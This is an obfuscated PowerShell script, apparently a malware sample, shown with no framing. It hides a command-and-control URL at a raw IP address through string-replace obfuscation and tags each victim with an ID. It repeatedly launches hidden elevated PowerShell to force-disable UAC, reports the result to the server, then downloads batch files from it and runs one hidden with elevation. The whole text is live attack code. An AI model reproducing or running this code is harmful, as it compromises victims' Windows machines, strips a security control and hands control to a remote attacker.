$mainUri = "hujkdtujkdtujkdp:ujkd/ujkd/157.173.104.153/ujkduujkdpujkd/ujkdujkd".Replace("ujkd","");
function postRequest($url,$text) {
$request = [System.Net.WebRequest]::Create($url);
$request.Method = "POST";
$request.ContentType = "application/x-www-form-urlencoded";
$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();
function gid
$regPath = "HKLM:\Software\Wireless"
$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue
if ($null -ne $exist) {
$uid = (Get-ItemProperty $regPath -Name uid).uid
else {
$local = "$env:public\documents\id.log"
if (Test-Path $local) {
$uid = [IO.File]::readalltext($local)
$uid = $uid.Substring(0,36)
else {
$uid = ([System.Guid]::NewGuid()).ToString()
$uid >> $local
return $uid
function sdu () {
$rtet44gg = "Ht3gjt50Kt3gjt50Lt3gjt50M:t3gjt50\t3gjt50St3gjt50Ot3gjt50FTt3gjt50WAt3gjt50Rt3gjt50E\Mt3gjt50ict3gjt50rost3gjt50oft3gjt50t\Wit3gjt50ndt3gjt50owt3gjt50s".Replace("t3gjt50","") + "i3bnoie4\i3bnoie4Cui3bnoie4ri3bnoie4rei3bnoie4ntVi3bnoie4eri3bnoie4si3bnoie4ioi3bnoie4n\Pi3bnoie4oli3bnoie4ici3bnoie4iei3bnoie4s\i3bnoie4Si3bnoie4ysti3bnoie4emi3bnoie4".Replace("i3bnoie4","")
$ruiibttew = "Cy5tjogroony5tjogrosey5tjogronty5tjogroPy5tjogroroy5tjogrompy5tjogroty5tjogro".Replace("y5tjogro","") + "Bu6gjoioehu6gjoioavu6gjoioiu6gjoioorAu6gjoiodmu6gjoioin".Replace("u6gjoio","")
$ruiibttew2 = "Ep8ITAwfno44jgnp8ITAwfno44jgablp8ITAwfno44jgeLp8ITAwfno44jgUp8ITAwfno44jgAp8ITAwfno44jg".Replace("p8ITAwfno44jg","")
$val = (Get-ItemProperty -Path $rtet44gg -Name $ruiibttew).$ruiibttew
$val2 = (Get-ItemProperty -Path $rtet44gg -Name $ruiibttew2).$ruiibttew2
if ($val -eq 0 -or $val2 -eq 0) {
$uid = gid
$url = $mainUri + "index.php"
postRequest $url "uid=$uid&msg=UAC off in default!"
return
#disable force
while ($true) {
$val = (Get-ItemProperty -Path $rtet44gg -Name $ruiibttew).$ruiibttew
$val2 = (Get-ItemProperty -Path $rtet44gg -Name $ruiibttew2).$ruiibttew2
if ($val -ne 0 -and $val2 -ne 0) {
Start-process PowerShell -WindowStyle Hidden -verb RunAs -ArgumentList "Set-ItemProperty -Path $rtet44gg -Name $ruiibttew -Value 0 -Force"
Start-Sleep -m 500
else {
$uid = gid
$url = $mainUri + "index.php"
postRequest $url "uid=$uid&msg=UAC force disabled!"
function newDir($path) {
if ((Test-Path $path) -eq $false ) {
New-Item -ItemType Directory -Path $path
function schReg {
$url1 = $mainUri + "trigger"
$url2 = $mainUri + "scheduler-once"
$url3 = $mainUri + "scheduler-rpt"
$dst1 = $env:TEMP + "\k1.bat"
$dst2 = $env:TEMP + "\scheduler-once.bat"
$dst3 = $env:TEMP + "\k2.bat"
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($url1,$dst1)
$WebClient.DownloadFile($url2,$dst2)
$WebClient.DownloadFile($url3,$dst3)
Start-Process -FilePath $dst2 -Verb RunAs -WindowStyle Hidden
function action {
Start-Sleep -Milliseconds 300
schReg
action